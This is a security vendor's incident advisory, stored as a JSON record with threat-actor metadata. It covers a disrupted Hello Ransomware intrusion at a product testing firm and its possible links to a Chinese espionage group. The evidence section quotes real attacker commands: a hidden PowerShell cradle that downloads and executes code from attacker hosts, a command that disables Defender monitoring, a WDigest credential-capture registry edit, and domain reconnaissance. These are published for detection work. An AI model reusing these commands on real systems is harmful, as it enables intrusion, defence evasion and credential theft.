{ "id": "4b8e7bf5-0cfd-4b30-9b3b-4032f216648e", "created_at": "2026-04-06T00:10:01.453106Z", "updated_at": "2026-04-10T03:38:20.69279Z", "deleted_at": null, "sha1_hash": "1aa5a21d68cedb2cffb923a011be8e5cd7b1bb64", "title": "Ransomware Hackers Attack a Top Safety Testing Org. Using Tactics and Techniques Borrowed from Chinese Espionage Groups", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 418813, "plain_text": "Ransomware Hackers Attack a Top Safety Testing Org. Using\r\nTactics and Techniques Borrowed from Chinese Espionage Groups\r\nArchived: 2026-04-05 17:40:06 UTC\r\nExecutive Summary\r\nIn late July, eSentire, a global provider of Managed and Detection and Response services, disrupted a cyberattack\r\nin midstream, in which hackers had obtained hands-on-keyboard access to the organization’s network through a\r\nvulnerable web server. Because the testing company evaluates hundreds of products from around the globe, it\r\nhouses a lot of intellectual property, making it a very desirable victim.\r\nAs eSentire’s security research team, The Threat Response Unit (TRU), began to investigate the incident, they\r\ndiscovered some very curious findings, relating to both the threat group behind the attack, as well as the tools and\r\ntechniques used in the attack.\r\nInterestingly, the cyber gang which launched the attack mimicked much of the same Motus Operandi (MO) ----of\r\nthat of the infamous Chinese cyber espionage group, Emissary Panda (a.k.a. APT27) or that of a threat group\r\nclosely associated with Emissary Panda. For example, several of the infiltration tools used in this incident have\r\nbeen seen in past cyberattacks attributed to Chinese cyber groups.\r\nOf course, the attack could be part of a false flag campaign. The attack chain borrows from publicly disclosed\r\nChinese, nation-state tools and procedures, including a SharePoint exploit and the use of a popular tool called\r\nChina Chopper. Additionally, the Hello Ransomware, which the threat group is known to deploy into the victims’\r\nenvironment, does not appear to have a leak site or blog and the ransomware is not delivered under a typical\r\nRansomware-as-a-Service model.\r\nAdditionally, the perceived low quality of the ransomware and the lack of any known ransomware breaches by\r\nHello Ransomware, in addition to the threat group’s use of intrusion and reconnaissance methods which are\r\ntypically associated with sophisticated actors, raises the question of whether the ransomware is the primary goal of\r\nthe operators. Or are the cybercriminals dropping ransomware into their target victims’ IT environment to simply\r\ndistract from their real motive---cyber espionage?\r\nKey Points:\r\nThe attack occurred at a product safety testing organization. This attack was stopped early in the infection\r\nchain and attackers did not get beyond initial intrusion actions – no ransomware deployment was observed\r\nTechnical details and timeline are included in this document for detection opportunities\r\nTechniques, Tactics, and Procedures (TTPs) match recent Hello Ransomware campaigns and portions of\r\nthe attack bear a resemblance to Chinese state- actor techniques:\r\nInitial Access occurred on a SharePoint Server\r\nPowerShell was masquerading as kaspersky via set-Alias command\r\nhttps://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups\r\nPage 1 of 8\n\nKaspersky is a well-known anti-virus provider\r\nThe threat actors carried out post-compromise domain reconnaissance and showed interest in\r\nMicrosoft Exchange\r\nTime delays between reconnaissance activity were consistent with a threat actor issuing real-time\r\ncommands\r\nThreat actors used Mimikatz (a credential theft tool) and Cobalt Strike (an intrusion framework)\r\nwrapped in Metasploit (exploitation framework)\r\nThreat actors attempted to disable endpoint monitoring\r\nInfrastructure naming conventions bear a similarity to IOCs in previous Hello Ransomware\r\nincidents\r\nIncident\r\neSentire's machine learning PowerShell classifier detected a Cobalt Strike beacon deployment at a product safety\r\ntesting company. Threat actors attempted to masquerade PowerShell command execution of the beacon as a\r\nKaspersky service, attempting to bypass security controls via application whitelisting. The payload was delivered\r\nas a Metasploit payload, implying that a vulnerability was present on the target’s perimeter and was exploited.\r\nFurther investigation revealed that the target’s compromised server was hosting an out-of-date version of the\r\nWindows operating system and a vulnerable SharePoint instance. Both initial access and post-compromise\r\nbehavior of this attack have previously been observed in recent Hello Ransomware incidents and resemble attack\r\nchains previously attributed to Chinese nation-state actors such as Emissary Panda and/or UNC215. Emissary\r\nPanda (referred as APT27 by the U.S. federal government) is a well-known Chinese cyberespionage group who\r\nhas been active since 2010. Historically, they have targeted government, defense, technology, energy, aerospace\r\nand various manufacturing sectors, including being credited with the breach of several U.S. Defense contractors in\r\n2010, where they reportedly stole terabytes of data. Interestingly, until 2020, Emissary Panda's primary focus\r\nappeared to be cyber espionage and intelligence gathering. However, since then several security research groups\r\nhave linked Emissary Panda to multiple ransomware attacks. [1][2][3][4][5]. FireEye recently published a report\r\nstating they had not observed activity from Emissary Panda since 2015, challenging the notion that Emissary\r\nPanda was involved in recent ransomware attacks.\r\nEvidence from this incident is presented in the Technical Details section and can be helpful for building detection\r\nrules.\r\nNot a Ransomware-as-a-Service\r\nHello Ransomware incidents (including the attack against the testing company) have demonstrated several\r\nmarkers of a typical ransomware intrusion, and yet have some distinct characteristics. First, the Hello\r\nRansomware is not known to use an affiliate or service model. No leak site for Hello Ransomware has been\r\nobserved by eSentire’s Threat Response Unit (TRU). Secondly, the four-year history of Hello Ransomware raises\r\nmany questions. A variant of Hello Ransomware first appeared on the scene in 2017, copying heavily from the\r\npublicized WannaCry ransom note, including the phrase “But you have not so enough time”. Security researchers\r\nsubsequently found that several other ransomware letters used similar verbiage and formatting from the original\r\nWannaCry ransomware note. Linguists who analyzed the WannaCry ransom note in 2017 attributed the note to\r\nhttps://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups\r\nPage 2 of 8\n\nChinese speakers. Law enforcement agencies from around the globe, as well as top security researchers,\r\ndetermined that WannaCry was the creation of the infamous hacking group, the Lazarus Group, also known as\r\nAPT38, who is known to work at the behest of the North Korean government. In February 2021, the U.S.\r\nDepartment of Justice announced the indictment of three men they allege are members of units of the\r\nReconnaissance General Bureau (RGB), a military intelligence agency of the Democratic People’s Republic of\r\nKorea (DPRK). The North Korean military hacking units are more commonly known in the cybersecurity\r\ncommunity as Lazarus Group or Advanced Persistent Threat 38 (APT38). The indictment went on to say that \"the\r\nthree defendants were members of units of the RGB and were at times stationed by the North Korean government\r\nin other countries, including China and Russia.\"\r\nInterestingly, the encryption software used to create Hello Ransomware was only available in two languages in\r\n2017: English and Russian. It is not clear whether the 2017 variant of Hello Ransomware and the current variant\r\nare part of the same operation. In 2017, Hello Ransomware charged a flat rate of .05 Bitcoin (~$200 USD at the\r\ntime) but an associated wallet (17pXroP4MruitJzpTa88FAPAGD5q5QAPzb) has no transaction history. The Hello\r\nRansomware operators have since updated their ransom letter template and no longer have a fixed fee. In place of\r\nusing a wallet address, in 2021, the operators began using anonymous email services ProtonMail and Tutenota, as\r\nwell as the messaging app, WickrMe, to communicate with its victims.\r\nThe time from exploitation to hands-on activity was 15 minutes in the incident observed by TRU. The perceived\r\nlow quality of the ransomware, next to the experienced intrusion methods, raises the question of whether the\r\nransomware is the primary goal of the operators.\r\nFinally, the attack chain borrows from known Chinese, nation-state tools and procedures (Figure 1) [5], including\r\nthe SharePoint exploit and China Chopper. The Hello Ransomware’s evasion techniques can be traced back to\r\nChinese pentesting blogs (such as websec30 and Leticia’s Blog) in early 2021.\r\nFigure 1: Hello Ransomware TTP Chain observed by TRU (Grey Tombstones) compared to TTPs observed\r\nby other security organizations (e.g., Red = Trend Micro) in separate attacks deploying China Chopper via\r\nSharePoint exploit. The lighter colors represent a weak match between techniques and procedures while\r\ndarker colors represent stronger matches.\r\nAttribution Avoidance\r\nhttps://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups\r\nPage 3 of 8\n\nIn incidents with similar features observed by Palo Alto’s research team, Unit 42, they note similarities to\r\ncampaigns previously attributed to Emissary Panda but hesitate to draw conclusions:\r\n“The overlaps between these two sets of attacks include exploitation of a common vulnerability, similar toolset\r\nand a shared government victimology, but no strong pivot points to connect these attack campaigns together.” [1].\r\nPalo Alto’s analysis did not include any mention of Hello Ransomware. Similarly, TRU has no strong evidence\r\nconnecting Chinese espionage groups and Hello Ransomware, only an overlap in techniques and tools used. There\r\nare several scenarios that could explain this observation including: evolution of China’s cybercrime economy,\r\nnational interest in ransomware, or a non-Chinese group intentionally adopting Chinese tactics to mislead\r\nanalysis.\r\nReinforcing attribution uncertainty, recent analysis by FireEye suggests the 2019 SharePoint exploitation\r\ncampaigns attributed to Emissary Panda by Palo Alto are operated by another Chinese espionage group, UNC215,\r\nthat may or may not have a direct association with Emissary Panda [5].\r\nPointing Fingers: China and Ransomware in 2021\r\nThe topic of China in the ransomware market is an emerging interest, but understanding the implications isn’t so\r\nstraightforward. For example, U.S. accusations are related to the exploitation of Microsoft Exchange\r\n(ProxyLogon) by Chinese espionage group, Halfnium. However, it’s likely that Halfnium only provided the\r\nfoothold and other threat actors independently deployed ransomware such as DearCry.\r\nHistorically, espionage groups like Emissary Panda have been known to pursue nation-state interests, as opposed\r\nto the financial interests that are more common to ransomware threat groups. Use of ransomware by an espionage\r\ngroup could indicate a shift to financial motivations and could also serve as a cover for larger-scale espionage\r\noperations. On the other hand, the operators behind Hello Ransomware could be unrelated to espionage or\r\nnational interests or have a more convoluted and permissive relationship with Chinese national interests, like how\r\nWesterners perceive relationships between Russian cybercriminals and state agencies. \r\nAt least two countries and one security company loyal to Russian national interests have accused China of\r\nparticipating in the booming ransomware market. Most recently (July 2021), the Biden administration claimed\r\nthat China participated in ransomware extortion campaigns against U.S. companies [6]. Before that (May 2021),\r\nTaiwan accused China’s Winnti threat group of participating in a ransomware attack on Taiwanese oil\r\ninfrastructure [7]. At the end of 2020, Positive Technologies (a Russian IT company) attributed an attack to\r\nEmissary Panda that used a unique ransomware strain, which Positive Technologies dubbed Polar Ransomware\r\n[8]. This was detailed by Security Joes [2] in a report highlighting China’s interest in ransomware (Figure 2).\r\nPositive Technologies has since been accused by the U.S. of supporting national interests alongside sanctions\r\nagainst Russia [9].\r\nUltimately, the threat landscape around nation states and their relationships with domestic cybercriminals is an\r\narea of low transparency. The potential Russian origins of the application used to build the 2017 version of Hello\r\nRansomware and the replication of known Chinese linguistics in the 2017 ransom note imply that the operators\r\nmight be intentionally adopting known Chinese tactics to mislead attribution efforts.\r\nhttps://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups\r\nPage 4 of 8\n\nFigure 2: History of research associating China with Ransomware. Image copied from Security Joes’ report\r\n[2].\r\nEvidence\r\nFollowing are the technical details of the attack, as well as corresponding references to external observations of\r\nthe same techniques and tools.\r\nSuspected Exploit and Web Shell Activity\r\nIn the same moment that a malicious PowerShell call was observed spawning from the SharePoint IIS process, an\r\nexternal IP posted to Picker.aspx, as observed in previous SharePoint exploits:\r\nPOST /_layouts/15/Picker.aspx\r\nMasquerading as Kaspersky:\r\nUpon execution of the webshell, a PowerShell script fired, using the set-Alias command to masquerade Invoke-Expression (IEX) as kaspersky, a tactic employed in previous Hello Ransomware incidents as reported by\r\nTrendMicro [4]. The payload domain and directories from this incident (see code snippet below) also shared\r\ninfrastructure naming conventions and domain with those incidents (Figure 3):\r\n\"C:\\Windows\\System32\\cmd.exe\" /c powershell.exe -nop -w hidden set-alias -name kaspersky -value Invoke-Expression; kaspersky(New-Object Net.WebClient).DownloadString(‘https://micoo.dnsrd[.]com/css/s.css’)\r\nAdditional download strings embedded in the same masqueraded PowerShell call:\r\nhttps://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups\r\nPage 5 of 8\n\nDownloadString('http://micoo.dnsrd.com/css/t.css')\r\nDownloadString('http://80.92.205.55/css/i.css')\r\nCompared to infrastructure observed by TrendMicro:\r\nFigure 3: Screenshot of payload download sites observed by TrendMicro [4]. Compare to what TRU\r\nobserved in the code snippet above.\r\nCobalt Strike Injecting Mimikatz into svchost\r\nInjection into svchost has been attributed to Emissary Panda previously [2] and is noted as a Chinese APT TTP [5]\r\nbut also appears in a publicly available Cobalt Strike profile [11].\r\nsvchost.exe -k wksvc\r\nC:\\Windows\\sysnative\\svchost.exe -k wksvc called \"NtProtectVirtualMemory\"\r\nPrivilege escalation attempt via named pipe (Mimikatz):\r\nPrivilege escalation was attempted, consistent with observations by Unit 42 in previous Hello Ransomware\r\nincidents [1].\r\ncmd.exe /c echo \u003cid\u003e \u003e \u003cPipe Address\u003e\r\nAttempt to disable security monitoring:\r\nVia Windows Management Instrumentation (wmic), another PowerShell call is deployed in a failed attempt to\r\ndisable monitoring services. This command was similarly observed in previous Hello Ransomware incidents [3].\r\nwmic /node:\u003chost\u003e process call create \"powershell -c Set-MpPreference -PUAProtection disable;Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableBehaviorMonitoring $true\"\r\nCredential Scraping (Mimikatz):\r\nFinally, Mimikatz is deployed to configure the system with the intention of capturing credentials from future\r\nlogins via updating WDigest in the Windows registry. Mimikatz is a known tool of Emissary Panda [14] and\r\nUNC215 [5]. Emissary Panda is known to use a variant called Wrapikatz that wraps Mimikatz in a loader with\r\nhttps://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups\r\nPage 6 of 8\n\ndefense evasion. This procedure could be consistent with the attempts at masquerading and defense disabling that\r\npreceded this malicious registry update, but it’s impossible to tell what implementation of Mimikatz was used.\r\nreg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t\r\nREG_DWORD /d 1 /f\r\nDomain Reconnaissance with Interest in Exchange\r\nA common implementation of reconnaissance tactics in today’s threat landscape is to automatically attempt to\r\ncollect all the domain information available. We hypothesize that this information is automatically collected and\r\nsent back to intruders allowing them to review successful footholds across their orchestration platform. This\r\ninformation helps bad actors assess the value of the company and the cost of obtaining domain admin privileges.\r\nIn this case, however, domain reconnaissance commands had human-scale delays between them (Figure 4), like\r\nthose measured by Palo Alto’s Unit42 [1].\r\nFigure 4: Time delays between post-compromise commands and Mimikatz injections observed by TRU\r\nimply a human cadence.\r\nIn this incident Exchange servers were targeted during post-compromise reconnaissance.\r\nChina Chopper is a known tool of espionage groups (including Emissary Panda) [5,13] and TrendMicro has\r\nreported seeing China Chopper in previous Hello Ransomware incidents [4], while FireEye notes its usage by\r\nUNC215 [5].\r\nPost Compromise Reconnaissance\r\nDomain Trust Discovery\r\ncmd.exe /C nltest /domain_trusts\r\nQueries Domain Controller for \"domain controllers\" group\r\ncmd.exe /C net group \"domain controllers\" /domain\r\nQueries Domain Controller for \"exchange servers\" group\r\ncmd.exe /C net group \"exchange servers\" /domain\r\nQueries Domain Controller for \"domain computers\" group - No netconn observed\r\nhttps://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups\r\nPage 7 of 8\n\ncmd.exe /C net group \"domain computers\" /domain\r\n\"domain admins\" group enumeration\r\ncmd.exe /C net group \"domain admins\" /domain\r\nTime check and ping sprinkled throughout domain reconnaissance\r\ncmd.exe /C net time /domain\r\ncmd.exe /C ping -n 1 -4 -a \u003cDC\u003e\r\nIf you’re not currently engaged with a Managed Detection and Response provider, we highly recommend you\r\npartner with us for security services s to disrupt threats before they impact your business. Connect with an\r\neSentire Security Specialist.\r\nReferences:\r\n[1] https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/\r\n[2] https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf\r\n[3] https://cncs.gob.do/ransomware-hello-wickrme/\r\n[4] https://www.trendmicro.com/en_ca/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html\r\n[5] https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF\r\n[6] https://www.nbcnews.com/tech/tech-news/us-accuses-china-abetting-ransomware-attack-rcna1448\r\n[7] https://www.cyberscoop.com/cpc-ransomware-winnti-taiwan-china/\r\n[8] https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\n[9] https://home.treasury.gov/news/press-releases/jy0127\r\n[10] https://twitter.com/GossiTheDog/status/1227319811685875715\r\n[11] https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\r\n[12] https://attack.mitre.org/groups/G0027/\r\n[13] https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/\r\nSource: https://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrow\r\ned-from-chinese-espionage-groups\r\nhttps://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups" ], "report_names": [ "ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "274f04ff-fae8-4e90-bcf5-3e391a860cd5", "created_at": "2023-12-08T02:00:05.75114Z", "updated_at": "2026-04-10T02:00:03.493837Z", "deleted_at": null, "main_name": "UNC215", "aliases": [], "source_name": "MISPGALAXY:UNC215", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c", "created_at": "2022-10-25T15:50:23.819113Z", "updated_at": "2026-04-10T02:00:05.354598Z", "deleted_at": null, "main_name": "Threat Group-3390", "aliases": [ "Threat Group-3390", "Earth Smilodon", "TG-3390", "Emissary Panda", "BRONZE UNION", "APT27", "Iron Tiger", "LuckyMouse", "Linen Typhoon" ], "source_name": "MITRE:Threat Group-3390", "tools": [ "Systeminfo", "gsecdump", "PlugX", "ASPXSpy", "Cobalt Strike", "Mimikatz", "Impacket", "gh0st RAT", "certutil", "China Chopper", "HTTPBrowser", "Tasklist", "netstat", "SysUpdate", "HyperBro", "ZxShell", "RCSession", "ipconfig", "Clambling", "pwdump", "NBTscan", "Pandora", "Windows Credential Editor" ], "source_id": "MITRE", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "c63ab035-f9f2-4723-959b-97a7b98b5942", "created_at": "2023-01-06T13:46:38.298354Z", "updated_at": "2026-04-10T02:00:02.917311Z", "deleted_at": null, "main_name": "APT27", "aliases": [ "BRONZE UNION", "Circle Typhoon", "Linen Typhoon", "TEMP.Hippo", "Budworm", "Lucky Mouse", "G0027", "GreedyTaotie", "Red Phoenix", "Iron Tiger", "Iron Taurus", "Earth Smilodon", "TG-3390", "EMISSARY PANDA", "Group 35", "ZipToken" ], "source_name": "MISPGALAXY:APT27", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0", "created_at": "2022-10-25T15:50:23.240383Z", "updated_at": "2026-04-10T02:00:05.299433Z", "deleted_at": null, "main_name": "APT38", "aliases": [ "APT38", "NICKEL GLADSTONE", "BeagleBoyz", "Bluenoroff", "Stardust Chollima", "Sapphire Sleet", "COPERNICIUM" ], "source_name": "MITRE:APT38", "tools": [ "ECCENTRICBANDWAGON", "HOPLIGHT", "Mimikatz", "KillDisk", "DarkComet" ], "source_id": "MITRE", "reports": null }, { "id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43", "created_at": "2025-08-07T02:03:24.68371Z", "updated_at": "2026-04-10T02:00:03.64323Z", "deleted_at": null, "main_name": "BRONZE UNION", "aliases": [ "APT27 ", "Bowser", "Budworm ", "Circle Typhoon ", "Emissary Panda ", "Group35", "Iron Tiger ", "Linen Typhoon ", "Lucky Mouse ", "TG-3390 ", "Temp.Hippo " ], "source_name": "Secureworks:BRONZE UNION", "tools": [ "AbcShell", "China Chopper", "EAGERBEE", "Gh0st RAT", "OwaAuth", "PhantomNet", "PoisonIvy", "Sysupdate", "Wonknu", "Wrapikatz", "ZxShell", "reGeorg" ], "source_id": "Secureworks", "reports": null }, { "id": "ea34919f-9093-4e34-b9de-a37ab9b4d5c4", "created_at": "2022-10-25T16:07:24.35727Z", "updated_at": "2026-04-10T02:00:04.952883Z", "deleted_at": null, "main_name": "UNC215", "aliases": [], "source_name": "ETDA:UNC215", "tools": [ "AdFind", "CHINACHOPPER", "China Chopper", "FOCUSFJORD", "HighShell", "HyperBro", "HyperSSL", "HyperShell", "Mimikatz", "NBTscan", "ProcDump", "PsExec", "SEASHARPEE", "SinoChopper", "SysUpdate", "TwoFace", "WHEATSCAN", "WinRAR", "certutil", "certutil.exe", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "5c13338b-eaed-429a-9437-f5015aa98276", "created_at": "2022-10-25T16:07:23.582715Z", "updated_at": "2026-04-10T02:00:04.675765Z", "deleted_at": null, "main_name": "Emissary Panda", "aliases": [ "APT 27", "ATK 15", "Bronze Union", "Budworm", "Circle Typhoon", "Earth Smilodon", "Emissary Panda", "G0027", "Group 35", "Iron Taurus", "Iron Tiger", "Linen Typhoon", "LuckyMouse", "Operation DRBControl", "Operation Iron Tiger", "Operation PZChao", "Operation SpoiledLegacy", "Operation StealthyTrident", "Red Phoenix", "TEMP.Hippo", "TG-3390", "ZipToken" ], "source_name": "ETDA:Emissary Panda", "tools": [ "ASPXSpy", "ASPXTool", "Agent.dhwf", "AngryRebel", "Antak", "CHINACHOPPER", "China Chopper", "Destroy RAT", "DestroyRAT", "FOCUSFJORD", "Farfli", "Gh0st RAT", "Ghost RAT", "HTTPBrowser", "HTran", "HUC Packet Transmit Tool", "HighShell", "HttpBrowser RAT", "HttpDump", "HyperBro", "HyperSSL", "HyperShell", "Kaba", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "Moudour", "Mydoor", "Nishang", "OwaAuth", "PCRat", "PlugX", "ProcDump", "PsExec", "RedDelta", "SEASHARPEE", "Sensocode", "SinoChopper", "Sogu", "SysUpdate", "TIGERPLUG", "TVT", "Thoper", "Token Control", "TokenControl", "TwoFace", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "Xamtrav", "ZXShell", "gsecdump", "luckyowa" ], "source_id": "ETDA", "reports": null }, { "id": "236429ce-6355-43f6-9b58-e6803a1df3f4", "created_at": "2026-03-16T02:02:50.60344Z", "updated_at": "2026-04-10T02:00:03.641587Z", "deleted_at": null, "main_name": "Bronze Union", "aliases": [ "Circle Typhoon ", "Emissary Panda " ], "source_name": "Secureworks:Bronze Union", "tools": [ "China Chopper", "OwaAuth", "Sysupdate" ], "source_id": "Secureworks", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA 